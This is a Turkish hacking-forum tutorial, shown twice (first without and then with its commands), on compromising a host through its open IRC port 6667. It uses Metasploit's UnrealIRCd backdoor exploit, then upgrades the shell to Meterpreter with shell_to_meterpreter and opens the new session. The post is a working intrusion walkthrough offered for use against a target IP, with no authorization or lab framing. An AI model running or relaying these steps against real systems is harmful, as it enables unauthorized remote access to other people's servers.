Merhabalar TürkHackTeam ailesi, bugün sizlere "Hedefe Port'tan (6667) Sızalım!" konusunu anlatacağım. Konu başlıklarına bakalım ardından konumuza geçelim.
Konu Başlıkları
Unrealircd Nedir?
Hedefe Port'tan (6667) Sızmak
Unrealircd Nedir?
Sanal sunucunuza, sanal makinenize IRC kurabilmemize yaramaktadır.
Hedefe Port'tan (6667) Sızmak
Öncelikle makinemizin IP adresini öğrenelim. Bunun için makinemize gidip
yazalım. Makineye erişemezseniz Netdiscover ile bulabilirsiniz.
Ardından ana makinemize gelerek zenmap'ı açalım ve sol üste IP adresimizi yazarak taramaya başlayalım. Gördüğünüz gibi 6667 port'u açık.
Daha sonra terminale gelerek
yazalım ve exploit arayışına girelim.
Şimdi elimizde ki bilgi Unreal bilgisi ve bunu kullanacağız. Terminale gelerek
yazalım. Sonuç çıktı burada 1. seçeneği kullanacağımız için
yazalım ve exploit'e girelim. Ardından ayarlarına bakmak için
yazalım.
Ayarları gördüğümüze göre RHOSTS kısmını dolduralım. Bunun için
yazalım ve exploit'i çalıştırmak için
yazalım.
Oturum 1 açıldı şimdi CTRL+Z yapalım ve exploit'den çıkalım. Ardından hedefe sızmak için kullanacığımız olan exploit'e geçiş yapalım.
yazalım ve ayarlama için
yazalım ve
diyerekte exploit'i çalıştıralım.
Yeni bir oturum başlatıldı o da session 2 buna bağlanmak için
yazalım ve içeri girelim.
Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...
Konu Başlıkları
Unrealircd Nedir?
Hedefe Port'tan (6667) Sızmak
Unrealircd Nedir?
Sanal sunucunuza, sanal makinenize IRC kurabilmemize yaramaktadır.
Hedefe Port'tan (6667) Sızmak
Öncelikle makinemizin IP adresini öğrenelim. Bunun için makinemize gidip
Kod:
ifconfig
Ardından ana makinemize gelerek zenmap'ı açalım ve sol üste IP adresimizi yazarak taramaya başlayalım. Gördüğünüz gibi 6667 port'u açık.
Daha sonra terminale gelerek
Kod:
msfconsole
Şimdi elimizde ki bilgi Unreal bilgisi ve bunu kullanacağız. Terminale gelerek
Kod:
search unreal
Kod:
use 1
Kod:
show options
Ayarları gördüğümüze göre RHOSTS kısmını dolduralım. Bunun için
Kod:
set RHOSTS Hedef_IP_adresi
Kod:
exploit
Oturum 1 açıldı şimdi CTRL+Z yapalım ve exploit'den çıkalım. Ardından hedefe sızmak için kullanacığımız olan exploit'e geçiş yapalım.
Kod:
use post/multi/manage/shell_to_meterpreter
Kod:
set SESSION 1
Kod:
exploit
Yeni bir oturum başlatıldı o da session 2 buna bağlanmak için
Kod:
session -i 2
Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...